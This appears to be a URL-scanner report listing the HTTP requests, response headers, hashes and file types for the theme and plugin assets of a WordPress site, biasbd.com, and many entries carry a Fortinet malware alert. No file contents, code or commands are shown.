biasbd.com/wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16
111.221.45.32200 OK 12 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (436)
Hash f8c2609b7304dfba35888623e8f2d469
a38bc6579ed8d4342468797b9e3be82f037226ab
601ab54c2a9091c69b21dfaef6822804e08125a9aeed95c80ff28aa85005ff24
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "10330-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 11527
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/pikaday.css?ver=5.2.16
111.221.45.32200 OK 993 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/pikaday.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash ac09342cd49d1170e62543496577ba97
6b4dd7faea1f5ea969a916693968653b8f86fb41
a481ff90cb74de04a621bad6defd5fa18354504ee5f770192170cc0fd8025fb3
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/pikaday.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "c30-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 993
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/core.css?ver=5.2.16
111.221.45.32200 OK 12 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/core.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 345d2979d981025559480456f9c714b7
06c188114984332ed84c39d3bf49b203bf29cc4f
c18022809486759f727ffbeaa668a678e2a07ce986517c5d18d081a853956bd6
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/core.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Wed, 23 Jan 2019 01:45:38 GMT
etag: "115db-5c47c742-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 12279
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/components/button.css?ver=5.2.16
111.221.45.32200 OK 793 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/components/button.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash cbddcd7411ec657b25b64941f09fa381
92d262c5ce23b31af4b21785b5736c8b486822f5
3de374e42ef63fd1f8b60c29837b469cdc69b72722c7ee6db24c39e39101e8eb
GET /wp-content/themes/industrial/css/components/button.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "94b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 793
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/swipebox.css?ver=5.2.16
111.221.45.32200 OK 1.3 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/swipebox.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash b21af63ea6bb174588218500e41938e6
fea019b73568ba3703a0abdb06bd0a4bb618c514
873eb93a3568e7207e74c019cbc3c18e35296c71a668d2dd7662dbc783617200
GET /wp-content/themes/industrial/css/swipebox.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "166e-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1348
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/style.css?ver=5.2.16
111.221.45.32200 OK 411 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/style.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 78fa704491160bf404d3e20ececf6c26
0342cc9218380f9fb1bdecffbe28a3e791719a99
b86a1df6ce235bf21a85d0181b439a0f1f1013a31973af4539e415c89941f260
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/style.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Sat, 09 Feb 2019 12:25:42 GMT
etag: "2c8-5c5ec6c6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 411
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/wordpress.css?ver=5.2.16
111.221.45.32200 OK 696 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/wordpress.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash 023fbdc82c706162832c4db9b00ffab4
c391c45fb0fd7b3dd9e6fbab0e411c2b3c114de9
3512649c5fba98039b175b1ede193ddc41431590327b48b2e4bc7b55280756ac
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/wordpress.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "80b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 696
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/custom.css?ver=5.2.16
111.221.45.32200 OK 40 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/custom.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with no line terminators
Hash 0df009c205c6595dfa2bd6df220bb49b
9f084f34dda0169577b05c49521e691a1022214a
38e2a843ebc496d80f59e180c384b804bd3034d228b3f1b09dfe7e3e11b2767a
GET /wp-content/themes/industrial/custom.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "28-56dd2758-0;;;"
accept-ranges: bytes
content-length: 40
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/css/components.css?ver=5.2.16
111.221.45.32200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/css/components.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 5c0c03646926e8ffa054ab548aabb2ad
a5a3d88f1af1ecd6f9ba1ae1a65c7acf1fca46b9
38b1cccc333d316012486e6a3390ffb3e3fff956d3d3e5cff1716367a3be1610
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/css/components.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Wed, 02 Jan 2019 21:39:26 GMT
etag: "19d14-5c2d2f8e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17786
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/newsletter/style.css?ver=6.1.0
111.221.45.32200 OK 1.2 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/newsletter/style.css?ver=6.1.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash eaa017c0514d60af9ba7281e692af7e3
d781a66d9945b12555d2d78ce462a582aaeddb9b
ce6b5e769b94fa9caaef9a1822c0401aa66de94af1a76ea55621fe3650283fe5
GET /wp-content/plugins/newsletter/style.css?ver=6.1.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 01 Jul 2019 18:27:56 GMT
etag: "18c8-5d1a50ac-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1193
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
111.221.45.32200 OK 4.0 kB URL HTTP/1.1 biasbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (9959)
Hash 2f89b08855471c7476435ce0bec33ba7
970533f152623df03b5fc6fb793b21889e4e0349
d200586b6dd1ff779b6c30947361ff736e076d8c7d502505ab3174ca33455ea0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Fri, 20 May 2016 04:11:28 GMT
etag: "2748-573e8e70-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4034
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8
111.221.45.32200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (64614), with CRLF line terminators
Hash d4063405bdeedf677d13c9ce7b535aa1
256f3aed2dfad47a4f42e45356fd9aedb7be1f31
d31e0030358c9ee54256451fd2055125da1d7bd58da7b1ea901aacfe25b84696
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "fdb5-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 18107
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7
111.221.45.32200 OK 954 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type HTML document, ASCII text, with very long lines (2637), with no line terminators
Hash e9992160668c7b30e45faf568c416f25
c004dc1d1a4868d6178aa1baac98711ee09c49e5
26ff0f8d7f14ce31d82a41909407ebf2eb0f104f113a5e01892f159e6666bc97
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "a4d-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 954
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
111.221.45.32200 OK 3.5 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (9172)
Hash de329cdce96c17fef9c3516b09ba51c6
664ff401060faaf6770ba30761b367d3aef10a8a
d9f05937cd228acc98f18a5e52ef966e0885afbcbc06d31da2e61e2b3f9e13f4
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "255e-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3533
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
111.221.45.32200 OK 34 kB URL HTTP/1.1 biasbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (31997)
Hash 167b4b3aef1415384a1d72a851584464
7edb972190b2048300fb5eb1668e54ec049b91a2
2d29b6f8700dbeda5b83991887d89ef850f3d570946b8eef360a86b9adcb0fb3
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Wed, 22 May 2019 05:39:24 GMT
etag: "17a69-5ce4e08c-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 33836
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5
111.221.45.32200 OK 355 B URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash b52dacb498e0baf0cac56cfc1137b634
04b880bf015577604ce2dcc19b9fc0e2c221b31f
884f610a43fadf231d67a53f3c406e0d753366f6e61588f05da6d2f361c6e5fd
GET /wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:41:34 GMT
etag: "37f-5c21c30e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 355
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3
111.221.45.32200 OK 4.0 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash a975a254fbc49a0086a84e624d7f094c
04885e648587650d8782310a9e8056191dbe5411
5033a9e7cefd80eda6878d4fe33c7e3a59f2da9e06a7a74d44961a9d8de4ee20
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "3868-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3993
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8
111.221.45.32200 OK 39 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (27287), with CRLF line terminators
Hash da82b93940d18779f96809b863a9f975
a0a731146a6a1a908b24ad04f3c2529dc81d9914
ca73520757002c8e415668ecef09cfca42ac2f8ad6a48d243959a9850855ac55
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "1afe4-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 38593
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
111.221.45.32200 OK 977 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1680)
Hash 60e4ab71992dc241e8f93bdf73199d7c
61fe2f1b6151b2c400f0b32998ce1504cdf2140a
eae30f24f574269c25ef73f888c3513259a8ea233be7cb25166bbc017e8318f0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "736-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 977
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8
111.221.45.32200 OK 9.6 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Unicode text, UTF-8 text, with very long lines (5178), with CRLF line terminators
Hash 4e1237e14f7156c3761b3aad4eb0fa0e
1a331f7be9045dbb71665b750124c9b59af89091
cedbb7e59f35b504f399b64b12652caadc94d7ea303ffab1f0fa7a46874f20e4
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Tue, 25 Dec 2018 05:42:44 GMT
etag: "9b46-5c21c354-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9570
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3
111.221.45.32200 OK 657 B URL HTTP/1.1 biasbd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 05693f8e3634eaa294f415f241b633b6
8136e661102dfe848f2ce6bf384b9aba8e2829cc
550c7691a7e68e174472d3b68b3b147e40cdfe90335e9cd441cffeece9f9dfc4
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "695-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 657
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
111.221.45.32200 OK 6.9 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
